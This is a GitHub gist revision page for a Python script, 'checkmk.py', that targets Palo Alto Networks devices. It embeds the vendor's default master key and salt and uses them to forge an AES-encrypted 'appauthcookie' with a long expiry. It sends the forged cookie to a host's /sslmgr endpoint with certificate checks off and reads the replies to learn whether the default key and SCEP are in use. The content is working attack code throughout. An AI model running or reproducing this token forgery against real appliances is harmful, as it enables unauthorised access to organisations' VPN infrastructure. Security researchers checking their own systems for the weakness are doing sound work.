-
-
Save danielcuthbert/dad56bb53133260f7ebb18d092a001ba to your computer and use it in GitHub Desktop.
Revisions
-
rqu1 revised this gist
Aug 4, 2022 . 1 changed file with 12 additions and 12 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -22,17 +22,17 @@ def _encrypt(self,data): e=self.c.encryptor() return e.update(self._pad(data)) + e.finalize() def encrypt(self, data): v='AQ==' # version 1 hash=b64encode(sha1(data.encode()).digest()).decode() ct=b64encode(self._encrypt(data.encode())).decode() return '-'+v+hash+ct def getPayload(spn): email="[email protected]" user="test" hostid="test" expiry=str(int(time.time())+1000000) token_pt=":".join((expiry, user, hostid)) token=PanCrypt().encrypt(token_pt) return "scep-profile-name={}&user-email={}&user={}&host-id={}&appauthcookie={}".format(spn, email, user, hostid, token) @@ -58,14 +58,14 @@ def classify(resp): if len(sys.argv)<2: print("usage: checkmk.py <host>") host=sys.argv[1]+"/sslmgr" spn="test" if len(sys.argv)>2: spn=sys.argv[2] data=getPayload(spn).encode() if "http" not in host: host="https://"+host #print("curl -k -d '{}' '{}'".format(data, host)) r=requests.post(host, data=data, headers={"content-type":"application/x-www-form-urlencoded"},verify=False) print(r.text) print(classify(r.text)) -
Aug 4, 2022 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -25,13 +25,13 @@ def encrypt(self, data): v=b'AQ==' # version 1 hash=b64encode(sha1(data).digest()) ct=b64encode(self._encrypt(data)) return b'-'+v+hash+ct def getPayload(spn): email=b"[email protected]" user=b"test" hostid=b"test" expiry=str(int(time.time())+1000000).encode() token_pt=b":".join((expiry, user, hostid)) token=PanCrypt().encrypt(token_pt) return "scep-profile-name={}&user-email={}&user={}&host-id={}&appauthcookie={}".format(spn, email, user, hostid, token) -
Aug 2, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,71 @@ from hashlib import md5, sha1 from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend from base64 import b64encode, b64decode import sys, time import requests DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8' class PanCrypt(): def __init__(self, key=DEFAULT_MASTERKEY): backend=default_backend() key=self._derivekey(key) self.c=Cipher(algorithms.AES(key), modes.CBC(b'\0'*16), backend=backend) def _derivekey(self,key): salt=b'\x75\xb8\x49\x83\x90\xbc\x2a\x65\x9c\x56\x93\xe7\xe5\xc5\xf0\x24' # md5("pannetwork") return md5(key+salt).digest()*2 def _pad(self, d): plen=16-(len(d)%16) return d+(chr(plen)*plen).encode() def _encrypt(self,data): e=self.c.encryptor() return e.update(self._pad(data)) + e.finalize() def encrypt(self, data): v=b'AQ==' # version 1 hash=b64encode(sha1(data).digest()) ct=b64encode(self._encrypt(data)) return '-'+v+hash+ct def getPayload(spn): email=b"[email protected]" user=b"test" hostid=b"test" expiry=bytes(int(time.time())+1000000) token_pt=b":".join((expiry, user, hostid)) token=PanCrypt().encrypt(token_pt) return "scep-profile-name={}&user-email={}&user={}&host-id={}&appauthcookie={}".format(spn, email, user, hostid, token) resp_default="<msg>Unable to find the configuration</msg>" resp_params="<msg>Invalid parameters</msg>" resp_invalid="<msg>Invalid Cookie</msg>" resp_good="<msg>Unable to generate client certificate</msg>" resps={ resp_default:"Default MK", resp_params: "Invalid parameters, bug?", resp_invalid: "MK is not default", resp_good: "Default MK, SCEP enabled and correct scep-profile-name", } def classify(resp): for i in resps: if i in resp: return resps[i] return "unknown" if __name__=="__main__": if len(sys.argv)<2: print("usage: checkmk.py <host>") host=sys.argv[1]+"/sslmgr" spn=b"test" if len(sys.argv)>2: spn=sys.argv[2] data=getPayload(spn) if "http" not in host: host="https://"+host #print("curl -k -d '{}' '{}'".format(data, host)) r=requests.get(host, data=data, headers={"content-type":"application/x-www-form-urlencoded"},verify=False) print(r.text) print(classify(r.text))